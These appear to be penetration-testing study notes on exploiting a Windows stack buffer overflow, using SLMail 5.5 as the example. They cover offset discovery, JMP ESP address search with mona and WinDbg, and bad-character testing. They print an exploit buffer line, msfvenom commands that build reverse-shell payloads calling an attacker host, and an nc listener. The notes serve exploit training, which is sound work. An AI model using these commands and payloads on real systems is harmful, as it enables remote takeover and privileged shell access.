Windows Buffer Overflow
Exploit and execute attacking command at a specific address
- ASCII: From Hex to character https://en.wikipedia.org/wiki/ASCII => 41 ~ A, 42 ~ B, 4B ~K
- 0xcc: Instruction for further debug. 0x90: NOP (No Operation)
- EIP => JMP ESP => ESP containing payload
- Sample SLMail program and exploit: https://github.com/R4v3nG/Seattle-Lab-Mail-SLmail-5.5-POP3-PASS-Remote-Buffer-Overflow
- URL: https://www.exploit-db.com/exploits/638.
- 0x783d6ddf is sample return address and sc is sample exploit code:
buffer = '\x41' * 4654 + struct.pack('<L', 0x783d6ddf) + '\x90'*32 + sc - Reference 1: https://medium.com/@loopspell/10-easy-steps-to-exploit-basic-stack-based-buffer-overflow-3a0472a8a80e
- Reference 2: https://www.whitelist1.com/2016/11/xstack-overflow-1-exploiting-slmail.html
- Immunity Debugger (RECOMMENDED): http://www.immunityinc.com/products/debugger/index.html
- d esp => The content of the stack.
- d => Next content
- mona.py addon to detect "jmp esp" https://github.com/corelan/mona and https://www.youtube.com/watch?v=AkUJ35f6yfI
!pvefindaddr j -r esp -n -o
- j = look for “jmp” (could be jmp, call, or push + ret)
- -r = register to look for
- -n = no null bytes
- -o = no OS dll’s (aslr, but also… just OS dll’s -> transportability issue)
- Look for the Fixup column. If it says “NO”, then it will most likely be reliable
- WinDbg: https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/debugger-download-tools
- Attach WinDbg to process id
- Assemble: a and enter
- Jump to esp: jmp esp and enter => Get the address before "jmp esp"
- Unassemble: u => Check for op code for jmp esp
- Look at the top of WinDbp for dlls of the program, check their start and end address.
- Search for op code: s start-address end-address op-code (ff e4)
- Select an address-for-EIP: Avoid address with 00 (null byte) to avoid string termination.
- Check again if address-for-EIP contains jmp esp: u address-for-EIP
- 0x00 is NULL and must be avoided
- Put buffer from 0x01 to 0xff to check bad characters => 255 characters + 1 \0 character.
badchars = ( "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" )
- Create data with 5000-character UNIQUE string in ASCII:
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 5000 - Lookup the offset in HEX:
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 5000 -q 12345678(Hex address)
-
Use mona.py add on for Immunity Debugger https://github.com/corelan/mona
-
!mona modulesto search for DLLs containing jmp esp. Rebase, safeSEH, ASLR and NXCompat are FALSE. OS DLL should be TRUE. -
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb to know "jmp esp" is FFE4
-
!mona find -s "\xff\xe4" - m target_dll.dllto find memory address of "jmp esp". Select the address without bad characters.
-
If this application were compiled with DEP support, our JMP ESP address would have to be located in the code (.text) segment of the module, as that is the only segment with both Read (R) and Executable (E) permissions.
-
If no DEP, we are free to use instructions from any address in this module.
-
To put JMP ESP address in the reversed way 0x5f4a358f. JMP ESP address is always reversed.
- ESP address is may be changed. => Not reliable.
- Can not use address with 00 to overwrite ESP address
- Use WinDbp to search for an address with "jmp esp" in dlls (which normally use static address). The base addresses of Windows DLLs are randomized in Win 7+. Must avoid addresses with 00.
- Use above addresses to be overwritten for EIP.
Use msfvenom to generate shellcode
-
See sample msfvenom
-
Can use Encoder: x86/alpha_upper to avoid invalid characters in shell code (bigger size payload, btw)
-
shikata_ga_nai seems to work in C only.
-
To copy C payload to python version if required.
Sample msfvenom with Unstaged payload ( so can use nc to listen)
-
In Perl:
msfvenom -p windows/shell_reverse_tcp -e x86/shikata_ga_nai -b "\x00\x0a\x0d" EXITFUNC=seh LPORT=4444 -f perl -
In C:
msfvenom -p windows/shell_reverse_tcp -e x86/shikata_ga_nai -b "\x00\x0a\x0d" EXITFUNC=seh LPORT=4444 -f c -
In Python:
msfvenom -p windows/shell_reverse_tcp -e x86/shikata_ga_nai -b "\x00\x0a\x0d" EXITFUNC=thread LHOST=Attacker_IP LPORT=4444 -f python -
In Python for x64:
msfvenom –a x64 -p windows/x64/shell_reverse_tcp -b "\x00\x0a\x0d" EXITFUNC=thread LHOST=192.168.13.132 LPORT=4444 -f python -
Use Exit Thread to avoid program crash.
-
-p –payload name
-
-e –encode format
-
-b –bad characters to omit <======= (In this case “\x00” and “\x0a”)
-
-f –programming format
-
Can split code to smaller chunks https://code.google.com/archive/p/w32-seh-omelet-shellcode/
- Use 25 x NOP (x90) to allow paddings to small changes of offsets due to x86/shikata_ga_nai encoder...
- Can use address with format "\xaa\xbb\xcc\xdd" in payload.
- Reverse shell listener: nc -nlvp 4444
- Hopefully has SYSTEM privilege shell.